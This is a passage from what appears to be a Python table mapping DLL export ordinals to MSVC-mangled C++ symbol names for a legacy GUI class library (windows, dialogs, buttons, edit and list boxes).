1768: b'??4Icon@@QAEAAV0@ABV0@@Z',
1769: b'??8Icon@@QBEEABV0@@Z',
1770: b'??9Icon@@QBEEABV0@@Z',
1771: b'?GetSizePixel@Icon@@QBE?AVSize@@XZ',
1772: b'??0Bitmap@@QAE@ABV0@@Z',
1773: b'??0Bitmap@@QAE@ABVResId@@@Z',
1774: b'??0Bitmap@@QAE@XZ',
1775: b'??1Bitmap@@QAE@XZ',
1776: b'??4Bitmap@@QAEAAV0@ABV0@@Z',
1777: b'??8Bitmap@@QBEEABV0@@Z',
1778: b'??9Bitmap@@QBEEABV0@@Z',
1779: b'?ChangePalette@Bitmap@@QAE?AVPalette@@ABV2@@Z',
1780: b'?GetColorCount@Bitmap@@QBEKXZ',
1781: b'?GetPalette@Bitmap@@QBE?AVPalette@@XZ',
1782: b'?GetSizeBytes@Bitmap@@QBEKXZ',
1783: b'?GetSizePixel@Bitmap@@QBE?AVSize@@XZ',
1784: b'?GetStockPalette@@YGPAUHPALETTE__@@H@Z',
1785: b'?lmemcpy@@YGXPAXPBXK@Z',
1786: b'??0GDIArray@@QAE@XZ',
1787: b'??0SaveStack@@QAE@GG@Z',
1788: b'??0SaveStruct@@QAE@XZ',
1789: b'??1GDIArray@@QAE@XZ',
1790: b'??1SaveStack@@QAE@XZ',
1791: b'??_GBrush@@QAEPAXI@Z',
1792: b'??_GPen@@QAEPAXI@Z',
1793: b'?ChangeSize@DynArray@@QAEKK@Z',
1794: b'?Count@SaveStack@@QBEKXZ',
1795: b'?EnumMetaProc@@YGHPAUHDC__@@PAUtagHANDLETABLE@@PAUtagMETARECORD@@HJ@Z',
1796: b'?GetSize@DynArray@@QBEKXZ',
1797: b'?Pop@SaveStack@@QAEPAUSaveStruct@@XZ',
1798: b'?Push@SaveStack@@QAEXPAUSaveStruct@@@Z',
1799: b'?IGetBmpData@@YG?AUBmpData@@ABVBitmap@@@Z',
1800: b'?ISetBmpData@@YGEPAUBmpPalette@@PAUBmpBits@@AAVBitmap@@@Z',
1801: b'?PlayMetaProc@@YGHPAUHDC__@@PAUtagHANDLETABLE@@PAUtagMETARECORD@@HJ@Z',
1802: b'??0MyDropTarget@@QAE@PAVWindow@@@Z',
1803: b'??0SVLookList@@QAE@GG@Z',
1804: b'??0TransferFormat@@QAE@K@Z',
1805: b'??0Window@@QAE@FPAV0@G@Z',
1806: b'??0Window@@QAE@PAV0@ABVResId@@@Z',
1807: b'??0Window@@QAE@PAV0@G@Z',
1808: b'??1MyDropTarget@@UAE@XZ',
1809: b'??1SVLookList@@QAE@XZ',
1810: b'??1Window@@UAE@XZ',
1811: b'??_7MyDropTarget@@6B@',
1812: b'??_7Window@@6B@',
1813: b'??_GDragServer@@QAEPAXI@Z',
1814: b'??_GMyDropTarget@@UAEPAXI@Z',
1815: b'??_GSVLookList@@QAEPAXI@Z',
1816: b'??_GWindow@@UAEPAXI@Z',
1817: b'?CaptureMouse@Window@@QAEXXZ',
1818: b'?ChangeCursor@Window@@QAEPAVCursor@@PAV2@@Z',
1819: b'?ChangeHelpId@Window@@QAEKK@Z',
1820: b'?ChangeOutputSizePixel@Window@@QAE?AVSize@@ABV2@@Z',
1821: b'?ChangeParent@Window@@QAEPAV1@PAV1@@Z',
1822: b'?ChangePointer@Window@@QAE?AVPointer@@ABV2@@Z',
1823: b'?ChangePosPixel@Window@@QAE?AVPoint@@ABV2@@Z',
1824: b'?ChangeSizePixel@Window@@QAE?AVSize@@ABV2@@Z',
1825: b'?ChangeUpdateMode@Window@@QAEEE@Z',
1826: b'?Disable@Window@@QAEXXZ',
1827: b'?DragEnter@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1828: b'?DragLeave@MyDropTarget@@UAEXXZ',
1829: b'?DragOver@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1830: b'?Drop@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1831: b'?Drop@Window@@UAEEABVDropEvent@@@Z',
1832: b'?Enable@Window@@QAEXXZ',
1833: b'?EnableDrop@Window@@QAEXE@Z',
1834: b'?Flash@Window@@QAEXXZ',
1835: b'?GetClassCursor@@YGPAUHICON__@@PAUHWND__@@@Z',
1836: b'?GetCursor@Window@@QBEPAVCursor@@XZ',
1837: b'?GetFocus@Window@@UAEXXZ',
1838: b'?GetHelpId@Window@@QBEKXZ',
1839: b'?GetHelpText@Window@@QBE?AVString@@XZ',
1840: b'?GetOutputSizePixel@Window@@UBE?AVSize@@XZ',
1841: b'?GetParent@Window@@QBEPAV1@XZ',
1842: b'?GetPointer@Window@@QBE?AVPointer@@XZ',
1843: b'?GetPosPixel@Window@@QBE?AVPoint@@XZ',
1844: b'?GetSizePixel@Window@@QBE?AVSize@@XZ',
1845: b'?GetText@Window@@QBE?AVString@@XZ',
1846: b'?GetType@TransferFormat@@QBEKXZ',
1847: b'?GetUpdateMode@Window@@QBEEXZ',
1848: b'?GetWindow@DropTarget@@QBEPAVWindow@@XZ',
1849: b'?GrabFocus@Window@@QAEXXZ',
1850: b'?HasFocus@Window@@QBEEXZ',
1851: b'?Hide@Window@@QAEXXZ',
1852: b'?InitDragServer@MyDropTarget@@AAEXXZ',
1853: b'?Insert@SVLookList@@QAEXPAVWindow@@@Z',
1854: b'?Invalidate@Window@@QAEXABVRectangle@@@Z',
1855: b'?Invalidate@Window@@QAEXXZ',
1856: b'?InvalidateForeground@Window@@QAEXABVRectangle@@@Z',
1857: b'?InvalidateForeground@Window@@QAEXXZ',
1858: b'?IsDropEnabled@Window@@QBEEXZ',
1859: b'?IsEnabled@StarObjectMgr@@QBEEXZ',
1860: b'?IsEnabled@Window@@QBEEXZ',
1861: b'?IsSVLook@Window@@QBEEXZ',
1862: b'?IsVisible@Window@@QBEEXZ',
1863: b'?KeyInput@Window@@UAEXABVKeyEvent@@@Z',
1864: b'?LoseFocus@Window@@UAEXXZ',
1865: b'?MouseButtonDown@Window@@UAEXABVMouseEvent@@@Z',
1866: b'?MouseButtonUp@Window@@UAEXABVMouseEvent@@@Z',
1867: b'?MouseMove@Window@@UAEXABVMouseEvent@@@Z',
1868: b'?Move@Window@@UAEXXZ',
1869: b'?OutputToScreenPixel@Window@@QBE?AVPoint@@ABV2@@Z',
1870: b'?Paint@Window@@UAEXABVRectangle@@@Z',
1871: b'?QueryDrop@Window@@UAEEABVDropEvent@@@Z',
1872: b'?ReleaseMouse@Window@@QAEXXZ',
1873: b'?Remove@ControlList@@QAEPAVWindow@@PAV2@@Z',
1874: b'?Remove@SVLookList@@QAEPAVWindow@@PAV2@@Z',
1875: b'?RequestData@MyDropTarget@@AAEXPAVDragServer@@@Z',
1876: b'?RequestHelp@Window@@UAEXABVHelpEvent@@@Z',
1877: b'?Resize@Window@@UAEXXZ',
1878: b'?ScreenToOutputPixel@Window@@QBE?AVPoint@@ABV2@@Z',
1879: b'?Scroll@Window@@QAEXFF@Z',
1880: b'?Scroll@Window@@QAEXFFABVRectangle@@@Z',
1881: b'?SetHelpText@Window@@QAEXABVString@@@Z',
1882: b'?SetPosSize@Window@@QAEXABVPoint@@ABVSize@@@Z',
1883: b'?SetPosSizePixel@Window@@QAEXABVPoint@@ABVSize@@@Z',
1884: b'?SetText@Window@@QAEXABVString@@@Z',
1885: b'?Show@Window@@QAEXXZ',
1886: b'?ToTop@Window@@QAEXXZ',
1887: b'?Update@Window@@QAEXXZ',
1888: b'??0ControlList@@QAE@GG@Z',
1889: b'?GetCancelButtonText@International@@QBEABVString@@XZ',
1890: b'?GetCancelButtonText@LanguageTable@@QBEABVString@@XZ',
1891: b'?GetHelpButtonText@International@@QBEABVString@@XZ',
1892: b'?GetHelpButtonText@LanguageTable@@QBEABVString@@XZ',
1893: b'?GetOKButtonText@International@@QBEABVString@@XZ',
1894: b'?GetOKButtonText@LanguageTable@@QBEABVString@@XZ',
1895: b'?Insert@ControlList@@QAEXPAVWindow@@K@Z',
1896: b'?TransferCtrlBits@@YGKG@Z',
1897: b'?TransferEditBits@@YGKG@Z',
1898: b'??0PalWindowList@@QAE@GG@Z',
1899: b'??0PopupList@@QAE@GG@Z',
1900: b'??0SysWin@@QAE@FPAVWindow@@G@Z',
1901: b'??0SysWin@@QAE@PAVWindow@@ABVResId@@@Z',
1902: b'??1SysWin@@UAE@XZ',
1903: b'??_7SysWin@@6B@',
1904: b'??_GSysWin@@UAEPAXI@Z',
1905: b'?Activate@SysWin@@UAEXXZ',
1906: b'?AnimatePalette@SysWin@@QAEXGABVPalette@@@Z',
1907: b'?ChangePalette@SysWin@@QAE?AVPalette@@ABV2@@Z',
1908: b'?Close@SysWin@@UAEEXZ',
1909: b'?Deactivate@SysWin@@UAEXXZ',
1910: b'?Insert@PalWindowList@@QAEXPAVWindow@@K@Z',
1911: b'?Insert@PopupList@@QAEXPAVWindow@@@Z',
1912: b'?IsActive@SysWin@@QBEEXZ',
1913: b'?Remove@PopupList@@QAEPAVWindow@@PAV2@@Z',
1914: b'??0WorkWindow@@QAE@FPAVWindow@@G@Z',
1915: b'??0WorkWindow@@QAE@PAVWindow@@ABVResId@@@Z',
1916: b'??0WorkWindow@@QAE@PAVWindow@@G@Z',
1917: b'??1WorkWindow@@UAE@XZ',
1918: b'??_7WorkWindow@@6B@',
1919: b'??_GWorkWindow@@UAEPAXI@Z',
1920: b'?ChangeIcon@WorkWindow@@QAE?AVIcon@@ABV2@@Z',
1921: b'?ChangeMinOutputSizePixel@WorkWindow@@QAE?AVSize@@ABV2@@Z',
1922: b'?ChangeOptOutputSizePixel@WorkWindow@@QAE?AVSize@@ABV2@@Z',
1923: b'?GetIcon@WorkWindow@@QBE?AVIcon@@XZ',
1924: b'?GetMinOutputSizePixel@WorkWindow@@QBE?AVSize@@XZ',
1925: b'?GetOptOutputSizePixel@WorkWindow@@QBE?AVSize@@XZ',
1926: b'?InitWorkWin@@YGXPAVWorkWindow@@@Z',
1927: b'?IsMaximized@WorkWindow@@QBEEXZ',
1928: b'?IsMinimized@WorkWindow@@QBEEXZ',
1929: b'?Maximize@WorkWindow@@QAEXXZ',
1930: b'?Minimize@WorkWindow@@QAEXXZ',
1931: b'?Restore@WorkWindow@@QAEXXZ',
1932: b'??0MDIWindow@@QAE@PAVWorkWindow@@ABVResId@@@Z',
1933: b'??0MDIWindow@@QAE@PAVWorkWindow@@G@Z',
1934: b'??1MDIWindow@@UAE@XZ',
1935: b'??_7MDIWindow@@6B@',
1936: b'??_GMDIWindow@@UAEPAXI@Z',
1937: b'?IsMDIActivate@MDIWindow@@QAEEXZ',
1938: b'??0FloatWinList@@QAE@GG@Z',
1939: b'??0FloatingWindow@@QAE@PAVWindow@@ABVResId@@@Z',
1940: b'??0FloatingWindow@@QAE@PAVWindow@@G@Z',
1941: b'??1FloatingWindow@@UAE@XZ',
1942: b'??_7FloatingWindow@@6B@',
1943: b'??_GFloatingWindow@@UAEPAXI@Z',
1944: b'?ChangeZoomInOutputSizePixel@FloatingWindow@@QAE?AVSize@@ABV2@@Z',
1945: b'?GetZoomInOutputSizePixel@FloatingWindow@@QBE?AVSize@@XZ',
1946: b'?Insert@FloatWinList@@QAEXPAVFloatingWindow@@@Z',
1947: b'?IsZoomedIn@FloatingWindow@@QBEEXZ',
1948: b'?Remove@FloatWinList@@QAEPAVFloatingWindow@@PAV2@@Z',
1949: b'?Zoom@FloatingWindow@@UAEXXZ',
1950: b'?ZoomIn@FloatingWindow@@QAEXXZ',
1951: b'?ZoomOut@FloatingWindow@@QAEXXZ',
1952: b'??0Dialog@@QAE@FPAVWindow@@G@Z',
1953: b'??0Dialog@@QAE@PAVWindow@@ABVResId@@@Z',
1954: b'??0Dialog@@QAE@PAVWindow@@G@Z',
1955: b'??0ModalDialog@@QAE@FPAVWindow@@G@Z',
1956: b'??0ModalDialog@@QAE@PAVWindow@@ABVResId@@@Z',
1957: b'??0ModalDialog@@QAE@PAVWindow@@G@Z',
1958: b'??0ModelessDialog@@QAE@PAVWindow@@ABVResId@@@Z',
1959: b'??0ModelessDialog@@QAE@PAVWindow@@G@Z',
1960: b'??1Dialog@@UAE@XZ',
1961: b'??1ModalDialog@@UAE@XZ',
1962: b'??1ModelessDialog@@UAE@XZ',
1963: b'??_7Dialog@@6B@',
1964: b'??_7ModalDialog@@6B@',
1965: b'??_7ModelessDialog@@6B@',
1966: b'??_GDialog@@UAEPAXI@Z',
1967: b'??_GModalDialog@@UAEPAXI@Z',
1968: b'??_GModelessDialog@@UAEPAXI@Z',
1969: b'?Close@ModalDialog@@UAEEXZ',
1970: b'?EndDialog@ModalDialog@@QAEXF@Z',
1971: b'?Execute@ModalDialog@@QAEFXZ',
1972: b'?InitModalDialog@@YGXPAVModalDialog@@G@Z',
1973: b'?IsInExecute@ModalDialog@@QBEEXZ',
1974: b'?IsPinIn@ModelessDialog@@QBEEXZ',
1975: b'??0ErrorBox@@QAE@PAVWindow@@ABVResId@@@Z',
1976: b'??0ErrorBox@@QAE@PAVWindow@@GABVString@@@Z',
1977: b'??0InfoBox@@QAE@PAVWindow@@ABVResId@@@Z',
1978: b'??0InfoBox@@QAE@PAVWindow@@ABVString@@@Z',
1979: b'??0MessBox@@QAE@PAVWindow@@ABVResId@@@Z',
1980: b'??0MessBox@@QAE@PAVWindow@@GABVString@@1@Z',
1981: b'??0QueryBox@@QAE@PAVWindow@@ABVResId@@@Z',
1982: b'??0QueryBox@@QAE@PAVWindow@@GABVString@@@Z',
1983: b'??0WarningBox@@QAE@PAVWindow@@ABVResId@@@Z',
1984: b'??0WarningBox@@QAE@PAVWindow@@GABVString@@@Z',
1985: b'??1ErrorBox@@UAE@XZ',
1986: b'??1MessBox@@UAE@XZ',
1987: b'??1QueryBox@@UAE@XZ',
1988: b'??1WarningBox@@UAE@XZ',
1989: b'??_7ErrorBox@@6B@',
1990: b'??_7InfoBox@@6B@',
1991: b'??_7MessBox@@6B@',
1992: b'??_7QueryBox@@6B@',
1993: b'??_7WarningBox@@6B@',
1994: b'??_GErrorBox@@UAEPAXI@Z',
1995: b'??_GInfoBox@@UAEPAXI@Z',
1996: b'??_GMessBox@@UAEPAXI@Z',
1997: b'??_GQueryBox@@UAEPAXI@Z',
1998: b'??_GWarningBox@@UAEPAXI@Z',
1999: b'?Execute@MessBox@@QAEFXZ',
2000: b'?GetMessText@MessBox@@QBE?AVString@@XZ',
2001: b'?SetButtonText@MessBox@@QAEXGABVString@@@Z',
2002: b'?SetMessText@MessBox@@QAEXABVString@@@Z',
2003: b'??0SystemDialog@@QAE@FPAVWindow@@G@Z',
2004: b'??0SystemDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2005: b'??1ControlList@@QAE@XZ',
2006: b'??1SystemDialog@@UAE@XZ',
2007: b'??_7SystemDialog@@6B@',
2008: b'??_GControlList@@QAEPAXI@Z',
2009: b'??_GSystemDialog@@UAEPAXI@Z',
2010: b'?First@ControlList@@QAEPAVWindow@@XZ',
2011: b'?InitSystemDialog@@YGXPAVSystemDialog@@@Z',
2012: b'?Next@ControlList@@QAEPAVWindow@@XZ',
2013: b'??0FDFilterList@@QAE@GG@Z',
2014: b'??0FileDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2015: b'??0FileDialog@@QAE@PAVWindow@@G@Z',
2016: b'??0FilterItem@@QAE@XZ',
2017: b'??1FDFilterList@@QAE@XZ',
2018: b'??1FileDialog@@UAE@XZ',
2019: b'??1FilterItem@@QAE@XZ',
2020: b'??_7FileDialog@@6B@',
2021: b'??_GFDFilterList@@QAEPAXI@Z',
2022: b'??_GFileDialog@@UAEPAXI@Z',
2023: b'??_GFilterItem@@QAEPAXI@Z',
2024: b'?AddFilter@FileDialog@@QAEXABVString@@0@Z',
2025: b'?Clear@FDFilterList@@QAEXXZ',
2026: b'?Count@FDFilterList@@QBEKXZ',
2027: b'?Execute@FileDialog@@QAEFXZ',
2028: b'?FileSelect@FileDialog@@UAEXXZ',
2029: b'?FilterSelect@FileDialog@@UAEXXZ',
2030: b'?First@FDFilterList@@QAEPAUFilterItem@@XZ',
2031: b'?GetCurFilter@FileDialog@@QBE?AVString@@XZ',
2032: b'?GetCurPos@FDFilterList@@QBEKXZ',
2033: b'?GetObject@FDFilterList@@QBEPAUFilterItem@@K@Z',
2034: b'?GetPath@FileDialog@@QBE?AVString@@XZ',
2035: b'?InitFileDialog@@YGXPAVFileDialog@@G@Z',
2036: b'?Insert@FDFilterList@@QAEXPAUFilterItem@@K@Z',
2037: b'?IsSet@Link@@QBEEXZ',
2038: b'?Next@FDFilterList@@QAEPAUFilterItem@@XZ',
2039: b'?OK@FileDialog@@UAEJXZ',
2040: b'?Remove@FDFilterList@@QAEPAUFilterItem@@XZ',
2041: b'?RemoveAllFilter@FileDialog@@QAEXXZ',
2042: b'?RemoveFilter@FileDialog@@QAEXABVString@@@Z',
2043: b'?SetCurFilter@FileDialog@@QAEXABVString@@@Z',
2044: b'?SetDefaultExt@FileDialog@@QAEXABVString@@@Z',
2045: b'?SetPath@FileDialog@@QAEXABVString@@@Z',
2046: b'??0PrintDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2047: b'??0PrintDialog@@QAE@PAVWindow@@G@Z',
2048: b'??0PrinterSetupDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2049: b'??0PrinterSetupDialog@@QAE@PAVWindow@@G@Z',
2050: b'??1PrintDialog@@UAE@XZ',
2051: b'??1PrinterSetupDialog@@UAE@XZ',
2052: b'??_7PrintDialog@@6B@',
2053: b'??_7PrinterSetupDialog@@6B@',
2054: b'??_GPrintDialog@@UAEPAXI@Z',
2055: b'??_GPrinterSetupDialog@@UAEPAXI@Z',
2056: b'?CheckCollate@PrintDialog@@QAEXE@Z',
2057: b'?CheckSelection@PrintDialog@@QAEXE@Z',
2058: b'?EnableCollate@PrintDialog@@QAEXE@Z',
2059: b'?EnablePageFields@PrintDialog@@QAEXE@Z',
2060: b'?EnableSelection@PrintDialog@@QAEXE@Z',
2061: b'?Execute@PrintDialog@@QAEFXZ',
2062: b'?Execute@PrinterSetupDialog@@QAEFXZ',
2063: b'?InitPrintDialog@@YGXPAVPrintDialog@@@Z',
2064: b'?InitPrinterSetupDialog@@YGXPAVPrinterSetupDialog@@@Z',
2065: b'?IsJobActive@Printer@@QBEEXZ',
2066: b'?IsValid@Printer@@QBEEXZ',
2067: b'??0ColorDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2068: b'??0ColorDialog@@QAE@PAVWindow@@G@Z',
2069: b'??1ColorDialog@@UAE@XZ',
2070: b'??_7ColorDialog@@6B@',
2071: b'??_GColorDialog@@UAEPAXI@Z',
2072: b'?ChangeColor@ColorDialog@@QAE?AVColor@@ABV2@@Z',
2073: b'?Execute@ColorDialog@@QAEFXZ',
2074: b'??0FontDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2075: b'??0FontDialog@@QAE@PAVWindow@@G@Z',
2076: b'??1FontDialog@@UAE@XZ',
2077: b'??_7FontDialog@@6B@',
2078: b'??_GFontDialog@@UAEPAXI@Z',
2079: b'?ChangeFixedFontsOnly@FontDialog@@QAEEE@Z',
2080: b'?ChangeFont@FontDialog@@QAE?AVFont@@ABV2@@Z',
2081: b'?ChangePrinter@FontDialog@@QAEPAVPrinter@@PAV2@@Z',
2082: b'?Execute@FontDialog@@QAEFXZ',
2083: b'?InitFontDialog@@YGXPAVFontDialog@@G@Z',
2084: b'??0Pointer@@QAE@ABV0@@Z',
2085: b'??0Pointer@@QAE@ABVResId@@@Z',
2086: b'??0Pointer@@QAE@W4PointerStyle@@@Z',
2087: b'??0Pointer@@QAE@XZ',
2088: b'??1Pointer@@QAE@XZ',
2089: b'??4Pointer@@QAEAAV0@ABV0@@Z',
2090: b'??8Pointer@@QBEEABV0@@Z',
2091: b'??9Pointer@@QBEEABV0@@Z',
2092: b'?ChangePosPixel@Pointer@@SG?AVPoint@@ABV2@@Z',
2093: b'?GetPosPixel@Pointer@@SG?AVPoint@@XZ',
2094: b'?Hide@Pointer@@SGXXZ',
2095: b'?IsVisible@Pointer@@SGEXZ',
2096: b'?Show@Pointer@@SGXXZ',
2097: b'??0Cursor@@QAE@ABV0@@Z',
2098: b'??0Cursor@@QAE@XZ',
2099: b'??1Cursor@@QAE@XZ',
2100: b'??4Cursor@@QAEAAV0@ABV0@@Z',
2101: b'??8Cursor@@QBEEABV0@@Z',
2102: b'??9Cursor@@QBEEABV0@@Z',
2103: b'?ChangePos@Cursor@@QAE?AVPoint@@ABV2@@Z',
2104: b'?ChangeSize@Cursor@@QAE?AVSize@@ABV2@@Z',
2105: b'?ChangeSlant@Cursor@@QAEFF@Z',
2106: b'?Hide@Cursor@@QAEXXZ',
2107: b'?Show@Cursor@@QAEXXZ',
2108: b'??0Control@@QAE@FPAVWindow@@G@Z',
2109: b'??0Control@@QAE@PAVWindow@@ABVResId@@@Z',
2110: b'??0Control@@QAE@PAVWindow@@G@Z',
2111: b'??1Control@@UAE@XZ',
2112: b'??9Rectangle@@QBEEABV0@@Z',
2113: b'??_7Control@@6B@',
2114: b'??_GControl@@UAEPAXI@Z',
2115: b'?DrawCtrlText@Control@@QAEXABVPoint@@ABVString@@GGE@Z',
2116: b'?GetCtrlTextSize@Control@@QBE?AVSize@@ABVString@@GG@Z',
2117: b'?GetFocus@Control@@UAEXXZ',
2118: b'?HideFocus@Control@@QAEXXZ',
2119: b'?InitControl@@YGXPAVControl@@@Z',
2120: b'?LoseFocus@Control@@UAEXXZ',
2121: b'?ShowFocus@Control@@QAEXABVRectangle@@@Z',
2122: b'??0Button@@QAE@FPAVWindow@@G@Z',
2123: b'??0Button@@QAE@PAVWindow@@ABVResId@@@Z',
2124: b'??0Button@@QAE@PAVWindow@@G@Z',
2125: b'??0CancelButton@@QAE@PAVWindow@@ABVResId@@@Z',
2126: b'??0CancelButton@@QAE@PAVWindow@@G@Z',
2127: b'??0CheckBox@@QAE@PAVWindow@@ABVResId@@@Z',
2128: b'??0CheckBox@@QAE@PAVWindow@@G@Z',
2129: b'??0HelpButton@@QAE@PAVWindow@@ABVResId@@@Z',
2130: b'??0HelpButton@@QAE@PAVWindow@@G@Z',
2131: b'??0OKButton@@QAE@PAVWindow@@ABVResId@@@Z',
2132: b'??0OKButton@@QAE@PAVWindow@@G@Z',
2133: b'??0PushButton@@QAE@FPAVWindow@@G@Z',
2134: b'??0PushButton@@QAE@PAVWindow@@ABVResId@@@Z',
2135: b'??0PushButton@@QAE@PAVWindow@@G@Z',
2136: b'??0RadioButton@@QAE@PAVWindow@@ABVResId@@@Z',
2137: b'??0RadioButton@@QAE@PAVWindow@@G@Z',
2138: b'??0TriStateBox@@QAE@PAVWindow@@ABVResId@@@Z',
2139: b'??0TriStateBox@@QAE@PAVWindow@@G@Z',
2140: b'??1Button@@UAE@XZ',
2141: b'??1CancelButton@@UAE@XZ',
2142: b'??1CheckBox@@UAE@XZ',
2143: b'??1HelpButton@@UAE@XZ',
2144: b'??1OKButton@@UAE@XZ',
2145: b'??1RadioButton@@UAE@XZ',
2146: b'??1TriStateBox@@UAE@XZ',
2147: b'??7Link@@QBEEXZ',
2148: b'??_7Button@@6B@',
2149: b'??_7CancelButton@@6B@',
2150: b'??_7CheckBox@@6B@',
2151: b'??_7HelpButton@@6B@',
2152: b'??_7OKButton@@6B@',
2153: b'??_7PushButton@@6B@',
2154: b'??_7RadioButton@@6B@',
2155: b'??_7TriStateBox@@6B@',
2156: b'??_GButton@@UAEPAXI@Z',
2157: b'??_GCancelButton@@UAEPAXI@Z',
2158: b'??_GCheckBox@@UAEPAXI@Z',
2159: b'??_GHelpButton@@UAEPAXI@Z',
2160: b'??_GOKButton@@UAEPAXI@Z',
2161: b'??_GPushButton@@UAEPAXI@Z',
2162: b'??_GRadioButton@@UAEPAXI@Z',
2163: b'??_GTriStateBox@@UAEPAXI@Z',
2164: b'?ChangeState@TriStateBox@@QAE?AW4TriState@@W42@@Z',
2165: b'?Check@CheckBox@@QAEXE@Z',
2166: b'?Check@RadioButton@@QAEXE@Z',
2167: b'?Click@Button@@UAEXXZ',
2168: b'?Click@CancelButton@@UAEXXZ',
2169: b'?Click@HelpButton@@UAEXXZ',
2170: b'?Click@OKButton@@UAEXXZ',
2171: b'?EnableTriState@TriStateBox@@QAEXE@Z',
2172: b'?GetState@TriStateBox@@QBE?AW4TriState@@XZ',
2173: b'?InitCheckBox@@YGXPAVCheckBox@@@Z',
2174: b'?InitRadioButton@@YGXPAVRadioButton@@@Z',
2175: b'?IsChecked@CheckBox@@QBEEXZ',
2176: b'?IsChecked@RadioButton@@QBEEXZ',
2177: b'?IsTriStateEnabled@TriStateBox@@QBEEXZ',
2178: b'??0MenuButton@@QAE@FPAVWindow@@G@Z',
2179: b'??0MenuButton@@QAE@PAVWindow@@ABVResId@@@Z',
2180: b'??0MenuButton@@QAE@PAVWindow@@G@Z',
2181: b'??1MenuButton@@UAE@XZ',
2182: b'??_7MenuButton@@6B@',
2183: b'??_GMenuButton@@UAEPAXI@Z',
2184: b'?ChangePopupMenu@MenuButton@@QAEPAVPopupMenu@@PAV2@@Z',
2185: b'?Select@MenuButton@@UAEXXZ',
2186: b'??0BitmapButton@@QAE@PAVWindow@@ABVResId@@@Z',
2187: b'??0BitmapButton@@QAE@PAVWindow@@G@Z',
2188: b'??0SymbolButton@@QAE@PAVWindow@@ABVResId@@@Z',
2189: b'??0SymbolButton@@QAE@PAVWindow@@G@Z',
2190: b'??1BitmapButton@@UAE@XZ',
2191: b'??1SymbolButton@@UAE@XZ',
2192: b'??_7BitmapButton@@6B@',
2193: b'??_7SymbolButton@@6B@',
2194: b'??_GBitmapButton@@UAEPAXI@Z',
2195: b'??_GSymbolButton@@UAEPAXI@Z',
2196: b'?ChangeBitmap@BitmapButton@@QAE?AVBitmap@@ABV2@@Z',
2197: b'?ChangeSymbol@SymbolButton@@QAE?AW4SymbolType@@W42@@Z',
2198: b'?InitBitmapButton@@YGXPAVBitmapButton@@@Z',
2199: b'??0Edit@@QAE@FPAVWindow@@G@Z',
2200: b'??0Edit@@QAE@PAVWindow@@ABVResId@@@Z',
2201: b'??0Edit@@QAE@PAVWindow@@G@Z',
2202: b'??0MultiLineEdit@@QAE@PAVWindow@@ABVResId@@@Z',
2203: b'??0MultiLineEdit@@QAE@PAVWindow@@G@Z',
2204: b'??1Edit@@UAE@XZ',
2205: b'??1MultiLineEdit@@UAE@XZ',
2206: b'??_7Edit@@6B@',
2207: b'??_7MultiLineEdit@@6B@',
2208: b'??_GEdit@@UAEPAXI@Z',
2209: b'??_GMultiLineEdit@@UAEPAXI@Z',
2210: b'?ChangeMaxTextLen@Edit@@QAEGG@Z',
2211: b'?ChangeSelection@Edit@@QAE?AVSelection@@ABV2@@Z',
2212: b'?ClearModifyFlag@Edit@@QAEXXZ',
2213: b'?Copy@Edit@@QAEXXZ',
2214: b'?Cut@Edit@@QAEXXZ',
2215: b'?DeleteSelected@Edit@@QAEXXZ',
2216: b'?GetMaxTextLen@Edit@@QBEGXZ',
2217: b'?GetSelected@Edit@@QBE?AVString@@XZ',
2218: b'?GetSelection@Edit@@QBE?AVSelection@@XZ',
2219: b'?IsModified@Edit@@QBEEXZ',
2220: b'?Max@Selection@@QAEAAFXZ',
2221: b'?Max@Selection@@QBEFXZ',
2222: b'?Modify@Edit@@UAEXXZ',
2223: b'?Paste@Edit@@QAEXXZ',
2224: b'?ReplaceSelected@Edit@@QAEXABVString@@@Z',
2225: b'?SetEditSelection@@YGXPAUHWND__@@KK@Z',
2226: b'??0ComboBox@@QAE@FPAVWindow@@G@Z',
2227: b'??0ComboBox@@QAE@PAVWindow@@ABVResId@@@Z',
2228: b'??0ComboBox@@QAE@PAVWindow@@G@Z',
2229: b'??1ComboBox@@UAE@XZ',
2230: b'??_7ComboBox@@6B@',
2231: b'??_GComboBox@@UAEPAXI@Z',
2232: b'?Clear@ComboBox@@QAEXXZ',
2233: b'?DoubleClick@ComboBox@@UAEXXZ',
2234: b'?GetEntry@ComboBox@@QBE?AVString@@G@Z',
2235: b'?GetEntryCount@ComboBox@@QBEGXZ',
2236: b'?GetEntryPos@ComboBox@@QBEGABVString@@@Z',
2237: b'?InitCombo@@YGXPAVComboBox@@G@Z',
2238: b'?InsertEntry@ComboBox@@QAEEABVString@@G@Z',
2239: b'?IsTravelSelect@ComboBox@@QBEEXZ',
2240: b'?RemoveEntry@ComboBox@@QAEXABVString@@@Z',
2241: b'?RemoveEntry@ComboBox@@QAEXG@Z',
2242: b'?Select@ComboBox@@UAEXXZ',
2243: b'??0ListBox@@QAE@FPAVWindow@@G@Z',
2244: b'??0ListBox@@QAE@PAVWindow@@ABVResId@@@Z',
2245: b'??0ListBox@@QAE@PAVWindow@@G@Z',
2246: b'??0MultiListBox@@QAE@PAVWindow@@ABVResId@@@Z',
2247: b'??0MultiListBox@@QAE@PAVWindow@@G@Z',
2248: b'??1ListBox@@UAE@XZ',
2249: b'??1MultiListBox@@UAE@XZ',
2250: b'??_7ListBox@@6B@',
2251: b'??_7MultiListBox@@6B@',
2252: b'??_GListBox@@UAEPAXI@Z',
2253: b'??_GMultiListBox@@UAEPAXI@Z',
2254: b'?Clear@ListBox@@QAEXXZ',
2255: b'?DoubleClick@ListBox@@UAEXXZ',
2256: b'?GetEntry@ListBox@@QBE?AVString@@G@Z',
2257: b'?GetEntryCount@ListBox@@QBEGXZ',
2258: b'?GetEntryPos@ListBox@@QBEGABVString@@@Z',
2259: b'?GetSelectEntry@ListBox@@QBE?AVString@@G@Z',
2260: b'?GetSelectEntryCount@ListBox@@QBEGXZ',
2261: b'?GetSelectEntryPos@ListBox@@QBEGG@Z',
2262: b'?InsertEntry@ListBox@@QAEEABVBitmap@@G@Z',
2263: b'?InsertEntry@ListBox@@QAEEABVString@@ABVBitmap@@G@Z',
